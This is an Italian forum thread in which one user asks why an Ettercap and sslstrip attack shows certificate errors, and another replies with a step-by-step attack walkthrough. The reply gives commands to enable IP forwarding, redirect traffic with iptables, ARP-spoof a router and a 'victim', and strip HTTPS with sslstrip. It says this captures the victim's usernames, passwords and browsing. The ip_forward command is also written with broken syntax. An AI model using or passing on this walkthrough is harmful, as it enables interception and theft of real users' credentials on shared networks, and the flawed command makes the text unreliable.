Results 1 to 2 of 2

Thread: Problema con Ettercap & Sslstrip

  1. #1
    Just burned his ISO
    Join Date
    Apr 2011
    Posts
    3

    Default Problema con Ettercap & Sslstrip

    Ciao a tutti
    Ho provato un sacco di modi per sniffare le connessioni HTTPS, ma ho fallito con tutti i modi;
    Ora vi dico come ho fatto:
    Ho iniziato col togliere i "#" in etter.conf dove c'è ip tables e ipconfig, poi ho aperto Ettercap e ho iniziato lo sniffing con ARP Spoof, dopodichè avvio sslstrip;
    Ho provato anche con la funzione dell ip_forwading, ma non cambia niente; Il problema è che sniffa i pacchetti, ma il browser rileva sempre un certificato non valido dove c'è la connessione https

  2. #2
    Just burned his ISO
    Join Date
    Mar 2011
    Posts
    3

    Post Riferimento: Problema con Ettercap & Sslstrip

    Ti elenco nel dettaglio i passaggi da effettuare (ovviamente prima di utilizzarli è bene sapere la loro funzione):
    - Modifica il file etter.conf togliendo i # da iptables redir_command_on e redir_command_off
    - Apri un terminale e digita -> echo > 1 /proc/sys/net/ipv4/ip_forward;
    - Sempre nel terminale immetti -> iptables -t nat -A PREROUTING -i (nome tua interfaccia) -p tcp --dport 80 -j REDIRECT --to-port (scegli una porta, di solito il valore che si inserisce è 1000 oppure la 8080);
    - Adesso -> ettercap -i (interfaccia) -TqM ARP:REMOTE /iptuorouter/ /iptargetvittima/
    - Premi "h" per l'help di ettercap, con la lettera p avrai l'elenco dei plugin da utilizzare durante la sessione di MITM, scegli quello che ti interessa, è consigliabile remote_browser
    - Adesso apri un'altra console per far partire l'ssl strip (senza il quale ti verrà rilevato sempre un errore nel certificato) -> sslstrip -a -l (porta scelta per il redirect del traffico)

    Noterai che tutte le sessioni con connessione https si trasformeranno in http e nel terminale dove hai fatto partire il programma Ettercap visualizzerai tutti i dati di accesso come username e password, il sito internet visitato e l'indirizzo IP del sito, mentre aprendo il browser internet visualizzerai, grazie al plugin remote browser, tutte le pagine visitate dal target.

    Spero di esserti stato d'aiuto

Similar Threads

  1. Ettercap and Sslstrip problem
    By f4llcon in forum Beginners Forum
    Replies: 5
    Last Post: 11-02-2010, 05:26 PM
  2. problems with arpspoof, sslstrip, ettercap
    By username324 in forum Beginners Forum
    Replies: 9
    Last Post: 03-12-2010, 12:02 AM
  3. ettercap & sslstrip question
    By mroy1300 in forum OLD Newbie Area
    Replies: 0
    Last Post: 02-01-2010, 01:55 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •